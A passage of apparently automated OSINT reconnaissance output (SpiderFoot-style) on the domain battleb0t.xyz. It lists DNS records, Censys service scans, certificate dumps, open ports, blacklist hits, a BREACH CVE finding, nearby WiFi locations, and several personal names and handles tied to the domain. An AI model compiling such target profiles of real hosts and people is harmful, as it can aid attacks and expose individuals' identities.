"resolved_at": "2023-04-27T15:46:08.997890816Z"}, "mycloudcontroller.com": {"record_type": "A", "resolved_at": "2023-04-25T15:22:23.208380694Z"}, "micojardihori.tk": {"record_type": "A", "resolved_at": "2023-05-05T20:23:43.915610757Z"}, "brockhoff.fr": {"record_type": "A", "resolved_at": "2023-04-30T22:44:30.853447549Z"}, "tizhoo.ir": {"record_type": "A", "resolved_at": "2022-12-14T15:27:25.652479467Z"}, "smartarena.vipe.us": {"record_type": "A", "resolved_at": "2023-05-03T22:17:28.866034171Z"}, "glenholidays.com": {"record_type": "A", "resolved_at": "2023-05-02T15:02:00.797225124Z"}, "www.dailytungipara.com": {"record_type": "A", "resolved_at": "2023-04-26T14:47:46.439798109Z"}, "dev.wrightelliot.co.uk": {"record_type": "A", "resolved_at": "2023-05-05T20:36:24.562768060Z"}, "pinxiang2901.com": {"record_type": "A", "resolved_at": "2023-05-07T15:26:47.916101301Z"}, "www.kjgenerationministries.com": {"record_type": "CNAME", "resolved_at": "2022-12-05T13:35:30.694998001Z"}, "abkapp.vipe.us": {"record_type": "A", "resolved_at": "2023-04-16T21:06:58.495246539Z"}, "maturewell.org": {"record_type": "A", "resolved_at": "2023-05-07T21:17:46.109575572Z"}, "fullgamephone.com": {"record_type": "A", "resolved_at": "2023-01-26T13:33:39.078041595Z"}, "stocabpenope.tk": {"record_type": "A", "resolved_at": "2023-05-04T22:27:09.028863323Z"}, "martohacabe.ga": {"record_type": "A", "resolved_at": "2023-05-07T17:27:25.826314650Z"}, "www.terrtus.ch": {"record_type": "A", "resolved_at": "2023-04-28T13:06:01.112458353Z"}, "rensumexiberk.ml": {"record_type": "A", "resolved_at": "2023-05-03T01:55:35.944855020Z"}, "gusteiplexmola.tk": {"record_type": "A", "resolved_at": "2023-03-27T05:18:03.996467271Z"}, "mail.plafonpvcklaten.com": {"record_type": "A", "resolved_at": "2022-10-27T14:03:01.187052953Z"}, "www.comunicacaodedados.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-04-13T18:07:05.732544519Z"}, "conservativecollection.com": {"record_type": "A", "resolved_at": "2023-04-25T14:29:42.584815574Z"}, "lenscarspock.tk": {"record_type": "A", "resolved_at": "2023-05-11T21:41:33.881756893Z"}, "planafimentac.tk": {"record_type": "A", "resolved_at": "2023-05-07T21:56:14.030088831Z"}, "rec.vipe.us": {"record_type": "A", "resolved_at": "2023-04-30T03:14:09.561279109Z"}, "ndkfe-vjwc.valentiona890.workers.dev": {"record_type": "A", "resolved_at": "2023-05-03T00:07:50.549712076Z"}, "buvade.ml": {"record_type": "A", "resolved_at": "2023-04-27T19:50:04.921168507Z"}, "taapakspices.com": {"record_type": "A", "resolved_at": "2023-04-20T19:35:41.336607495Z"}, "diamondonlineshop.my.id": {"record_type": "A", "resolved_at": "2023-01-16T15:26:13.088949416Z"}, "youshareproject.com": {"record_type": "A", "resolved_at": "2023-05-05T16:03:41.028406500Z"}, "www.vrukshali.com": {"record_type": "A", "resolved_at": "2023-05-08T16:37:33.689821521Z"}, "www.youshareproject.com": {"record_type": "A", "resolved_at": "2023-05-07T16:20:45.109859563Z"}, "unareras.ml": {"record_type": "A", "resolved_at": "2022-10-20T00:00:33.698975202Z"}, "tinghoxad.tk": {"record_type": "A", "resolved_at": "2023-04-19T23:40:24.408979445Z"}, "smink.xyz": {"record_type": "A", "resolved_at": "2022-11-26T17:19:55.972898134Z"}, "howardsbakeryequipment.com": {"record_type": "A", "resolved_at": "2023-04-24T14:53:21.088861293Z"}, "mail.kasabugraphics.com": {"record_type": "A", "resolved_at": "2023-05-05T14:52:30.444010315Z"}, "tournleadnabatemo.tk": {"record_type": "A", "resolved_at": "2023-04-19T23:40:16.541179614Z"}, "profhuitritandespa.gq": {"record_type": "A", "resolved_at": "2023-05-09T17:19:25.416748634Z"}, "arpaman.ga": {"record_type": "A", "resolved_at": "2022-10-21T07:33:02.998113361Z"}, "vikk-play.space": {"record_type": "A", "resolved_at": "2023-01-29T18:05:12.078217209Z"}}, "names": ["www.kjgenerationministries.com.cdn.cloudflare.net", "mynevo.info", "sgenundia.tk", "gusteiplexmola.tk", "taapakspices.com", "yarmun.ru", "control.vipe.us", "smink.xyz", "rensumexiberk.ml", "www.septlightchristministries.org", "vikk-play.space", "www.terrtus.ch", "www.brevardnc.org", "cvgy.top", "conservativecollection.com", "mycloudcontroller.com", "asexloyndicla.tk", "tinghoxad.tk", "stocabpenope.tk", "tiketpabe.ml | 104.21.71.14 |
| 2023-05-12 03:08:45 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.213 | 104.196.30.220 |
| 2023-05-12 03:32:18 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 4 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-111-154.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-111-154.github.com |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 101 (Net ID: 00:01:03:7B:E0:44) | 37.780462,-122.390564 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Project hosting websites | battleb0t.github.io |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-B882 (Net ID: 9C:34:26:46:B8:80) | 37.751, -97.822 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.245): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NGMH (Net ID: 00:09:5B:B3:C8:70) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | USR9108 (Net ID: 00:14:C1:1A:3F:1C) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Freigut (Net ID: 00:01:21:21:C1:60) | 50.1188, 8.6843 |
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | kekw.battleb0t.xyz | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Audiojungle (Category: music)
https://audiojungle.net/user/ayhu | ayhu |
| 2023-05-12 02:46:50 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.148.97.127 |
| 2023-05-12 02:55:18 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 14061 | 46.101.229.70 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:0C:07:AC:29) | 41.8781, -87.6298 |
| 2023-05-12 02:51:20 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:57:f8:5f:6c:a4:d7:b1:d8:61:78:13:80:db:41:a4:54:3d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:23:04 2022 GMT
Not After : Feb 15 13:23:03 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d4:b5:dd:1d:03:00:c2:48:cc:5b:27:58:5a:1a:
ae:80:1c:0d:53:93:fb:69:7f:93:43:76:4d:e8:73:
1c:07:a2:3d:20:72:26:de:8b:cf:5e:08:ec:68:b1:
f5:77:47:34:1f:fc:12:0e:2f:4f:a4:d2:06:11:00:
78:b4:0d:40:fa:ba:21:05:d4:2d:c5:6d:14:14:39:
10:9a:e0:36:33:c9:8c:bb:e8:d5:33:a2:fb:d9:f7:
b5:1a:30:55:aa:67:e3:41:20:33:a1:e6:ed:c9:c3:
5b:50:61:0a:65:ba:c7:cc:f0:84:a3:6e:26:65:39:
57:a4:99:3b:03:5d:af:09:43:83:69:7f:84:65:08:
2e:12:10:15:1c:ad:1f:68:90:6a:0e:97:7d:ef:7a:
22:74:df:40:68:54:b2:c7:43:c9:cb:1c:9c:53:1d:
c4:68:a0:95:76:a1:bf:c8:18:fb:9d:30:f5:ff:26:
f8:35:1d:65:e6:a1:bc:6a:7f:70:ab:aa:3e:d6:87:
e6:17:39:3e:1e:ae:62:43:5c:02:c9:ab:c6:49:9a:
2c:43:3e:b0:0a:bb:6b:20:c9:45:43:a6:79:f2:70:
bf:69:eb:cb:fb:70:35:1a:f8:04:00:26:77:08:9e:
32:00:34:fd:0a:63:db:bc:61:0a:d9:52:e5:61:03:
a2:9b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:5A:2D:BE:67:DF:4E:45:A4:AD:A5:64:7A:31:7E:B3:39:8F:63:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
36:be:9b:e9:c6:04:01:1c:2c:7e:ac:66:f1:b1:7c:f0:ee:5e:
a7:7a:d6:c8:9e:79:b8:66:86:a3:c0:1f:2e:30:41:c8:ab:65:
cc:a9:76:5f:0c:9a:14:80:51:ed:a7:e9:7f:f2:bd:57:5c:9b:
04:31:55:52:cc:d9:5d:ee:2c:9b:e4:bf:d8:d9:92:19:14:10:
dd:51:d3:7f:4d:75:15:b6:a8:e3:fc:04:59:c4:b7:64:9f:51:
37:3d:db:dc:3f:62:ca:61:18:50:70:5c:05:5f:99:79:0d:a0:
0e:c8:35:8d:bb:f1:5e:79:d7:db:26:ea:af:a1:41:c0:38:87:
5a:1f:f0:8e:e8:e0:82:24:9f:5a:90:83:7a:4a:a7:ba:46:58:
13:f1:c7:56:f8:28:af:a1:60:8b:a6:cd:3c:87:94:ac:c7:fc:
20:7c:c8:b3:c3:76:a4:35:2d:72:c3:ee:ac:78:b8:e1:34:03:
38:a2:6a:44:20:aa:90:30:a3:3e:ab:ba:d0:59:e6:ec:06:0e:
8d:eb:87:b7:3c:38:30:f7:f2:e8:b8:2e:15:05:ad:78:2f:e8:
3c:50:44:89:a3:d8:8d:08:05:5d:7a:05:56:82:9c:5e:c3:16:
2a:39:5a:33:90:bb:6e:e6:f1:42:6a:27:46:25:76:11:a4:8f:
4f:1d:29:59
| battleb0t.xyz |
| 2023-05-12 03:10:09 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.108.0/24]
http://www.voipbl.org/update | 185.199.108.0/24 |
| 2023-05-12 02:53:19 | Internet Name | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | mail.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:33:10 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | vm.battleb0t.xyz | 45.131.109.53 |
| 2023-05-12 03:10:01 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | expressdryclean.gr | 165.232.113.95 |
| 2023-05-12 03:23:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.2:8080 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ChicoWLAN (Net ID: 00:0C:F6:4A:CA:EE) | 50.8897, 6.0563 |
| 2023-05-12 02:44:03 | Domain Name | No | SpiderFoot UI | 72 | 0 | 0 | 0 | None | battleb0t.xyz | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | www.ayhu.xyz | {'webSearchUrl': u'https://www.google.com/search?q=site:www.ayhu.xyz&aq=t&oe=utf-8&client=firefox-a&ie=utf-8&rls=org.mozilla%3Aen-US%3Aofficial', 'urls': ['https://www.ayhu.xyz/']} |
| 2023-05-12 02:57:36 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | battleb0t.xyz |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.185): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:8880 | 104.21.71.14 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:47:18 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b9:dc:49:67:68:c5:fe:31:cf:92:a4:a3:f2:91:5a:dc:15
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 19:07:11 2023 GMT
Not After : Apr 2 19:07:10 2023 GMT
Subject: CN=files.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:e4:bb:72:24:9a:3b:f5:c0:b6:00:b2:9e:75:64:
a2:c5:05:47:75:ee:45:0a:c4:64:a2:83:f0:3f:73:
63:b5:70:6c:7f:e6:38:41:f0:ce:48:1b:e9:cb:50:
e5:db:9b:1e:52:33:00:08:50:9b:48:a3:21:b1:72:
aa:97:ba:07:58:22:50:7b:e0:2e:66:ce:83:70:77:
e2:36:f5:0e:13:40:a0:5f:8e:ab:d5:28:a5:4a:11:
32:bf:f0:01:46:1e:7f:2c:f4:2c:07:22:93:45:a7:
52:4d:66:5a:2e:a0:5e:1d:49:67:6d:93:3c:d4:e7:
67:ac:0d:eb:84:c4:ad:1c:c6:3a:c8:a3:8e:b1:df:
54:8a:52:1f:ab:aa:01:49:57:78:fa:b6:5c:77:ae:
0a:d5:12:86:cb:ea:c3:13:b3:1e:aa:59:f3:df:50:
ef:11:40:b8:bb:45:d3:4e:d6:8e:bd:f2:33:ae:52:
06:ca:88:01:72:31:4f:46:00:bf:98:93:9a:2f:f8:
47:9a:87:b9:a0:cb:d1:a8:89:43:66:4d:f6:54:8d:
cf:4c:31:d7:d0:0d:e1:33:7b:c6:0e:1d:4a:3f:9a:
c4:dd:c7:68:08:e6:6f:b9:26:6c:49:f2:5f:ad:59:
da:74:03:6e:20:eb:9a:d2:3d:fb:bc:79:34:c6:43:
38:6b:71:f9:76:22:a0:ca:93:2e:c8:20:b0:a5:40:
b2:06:05:e9:aa:de:b1:b0:40:d3:fa:2b:db:3c:b4:
82:d4:58:96:b7:bc:70:be:ac:1c:cb:fc:f4:c1:71:
31:c2:05:84:ce:b2:c9:8b:1e:36:fd:72:15:79:33:
62:66:31:a9:1f:5f:76:ce:5e:82:a3:20:7b:a6:f9:
68:6f:ff:65:d5:4b:45:ed:7b:6b:c9:7e:38:35:b0:
